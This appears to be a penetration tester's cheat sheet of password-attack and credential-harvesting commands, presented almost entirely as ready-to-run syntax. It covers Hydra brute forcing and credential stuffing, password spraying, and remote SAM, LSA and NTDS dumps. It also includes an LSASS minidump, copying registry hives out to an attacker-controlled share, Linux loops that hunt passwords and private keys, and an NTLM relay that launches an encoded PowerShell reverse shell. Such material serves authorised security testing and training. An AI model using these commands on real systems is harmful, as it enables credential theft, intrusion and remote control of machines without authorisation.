Pentest_Notes

🔑 Password Attacks & Credential Harvesting

Organized notes for password attacks, cracking, and credential harvesting. Last Updated: 2026-03-27

Wordlist Generation

Checklist

CeWL — Custom Wordlist from Website

cewl https://www.target.com -d 4 -m 6 --lowercase -w custom.wordlist

Hashcat Rule-Based Mutation

hashcat --force password.list -r custom.rule --stdout > mut_password.list
hashcat --force password.list -r /usr/share/hashcat/rules/best64.rule --stdout > mut_password.list

Username Generation

./username-anarchy -i /path/to/firstlastnames.txt

Online Attacks (Brute Force)

Hydra

# Generic syntax
hydra -L user.list -P password.list <service>://<ip>

# Credential stuffing
hydra -C <user_pass.list> ssh://<IP>

# SSH
hydra -L users.txt -P passwords.txt ssh://<IP>

# HTTP Basic Auth
hydra -L wordlist.txt -P wordlist.txt -u -f <IP> -s <PORT> http-get /

# HTTP POST Form
hydra -l admin -P wordlist.txt -f <IP> -s <PORT> http-post-form "/login.php:username=^USER^&password=^PASS^:F=<form name='login'"

# POP3
hydra -L users.txt -p 'Company01!' -f <IP> pop3

CrackMapExec / NetExec

# SAM dump
crackmapexec smb <ip> --local-auth -u <user> -p <pass> --sam

# LSA secrets dump
crackmapexec smb <ip> --local-auth -u <user> -p <pass> --lsa

# NTDS dump
crackmapexec smb <ip> -u <user> -p <pass> --ntds

# Password spraying
nxc smb <IP_RANGE> -u users.txt -p 'Password1' --no-bruteforce

Offline Attacks (Hash Cracking)

Hashcat

# NTLM
hashcat -m 1000 <hash> /usr/share/wordlists/rockyou.txt --show

# NTLMv2
hashcat -m 5600 <hash_file> /usr/share/wordlists/rockyou.txt

# Kerberos TGS (Kerberoasting)
hashcat -m 13100 tgs.hash /usr/share/wordlists/rockyou.txt --force

# AS-REP (ASREPRoasting)
hashcat -m 18200 asrep.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule

# Linux shadow (SHA-512)
hashcat -m 1800 -a 0 unshadowed.hashes rockyou.txt -o cracked.txt

Common Hashcat Modes

Mode Hash Type
0 MD5
100 SHA1
1000 NTLM
1800 SHA-512 (Linux)
3200 bcrypt
5600 NTLMv2
13100 Kerberos TGS
18200 Kerberos AS-REP

John the Ripper

# Basic crack
john --wordlist=rockyou.txt hash.txt

# PDF hash
john --wordlist=rockyou.txt pdf.hash

# Unshadow for Linux
unshadow /tmp/passwd.bak /tmp/shadow.bak > /tmp/unshadowed.hashes

# Converters
office2john.py Protected.docx > protected-docx.hash
ssh2john id_rsa > id_rsa.hash
zip2john archive.zip > zip.hash

Credential Harvesting — Windows

# Search for passwords in files
findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml *.git *.ps1 *.yml

# LSASS dump
Get-Process lsass
rundll32 C:\windows\system32\comsvcs.dll, MiniDump <PID> C:\lsass.dmp full

# Registry hive extraction
reg.exe save hklm\sam C:\sam.save
reg.exe save hklm\system C:\system.save

# Transfer files
move sam.save \\<ATTACKER_IP>\share

# NTDS.dit extraction
cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\NTDS\NTDS.dit c:\NTDS\NTDS.dit

# Parse LSASS dump
pypykatz lsa minidump /path/to/lsass.dmp

# Parse registry hives
impacket-secretsdump -sam sam.save -system system.save LOCAL

Credential Harvesting — Linux

# Configuration files
for l in $(echo ".conf .config .cnf"); do echo -e "\nFile extension: " $l; find / -name *$l 2>/dev/null | grep -v "lib|fonts|share|core"; done

# Credentials in configs
for i in $(find / -name *.cnf 2>/dev/null | grep -v "doc|lib"); do echo -e "\nFile: " $i; grep "user\|password\|pass" $i 2>/dev/null | grep -v "\#"; done

# Database files
for l in $(echo ".sql .db .*db .db*"); do echo -e "\nDB File extension: " $l; find / -name *$l 2>/dev/null | grep -v "doc|lib|headers|share|man"; done

# Text files in home directories
find /home/* -type f -name "*.txt" -o ! -name "*.*"

# SSH keys
grep -rnw "PRIVATE KEY" /* 2>/dev/null | grep ":1"

SMB Relay & NTLM Theft

# SAM dump via relay
impacket-ntlmrelayx --no-http-server -smb2support -t <TARGET_IP>

# Reverse shell via relay
impacket-ntlmrelayx --no-http-server -smb2support -t <TARGET_IP> -c 'powershell -e <BASE64_REVSHELL>'

Common Pitfalls / Gotchas

References & Further Reading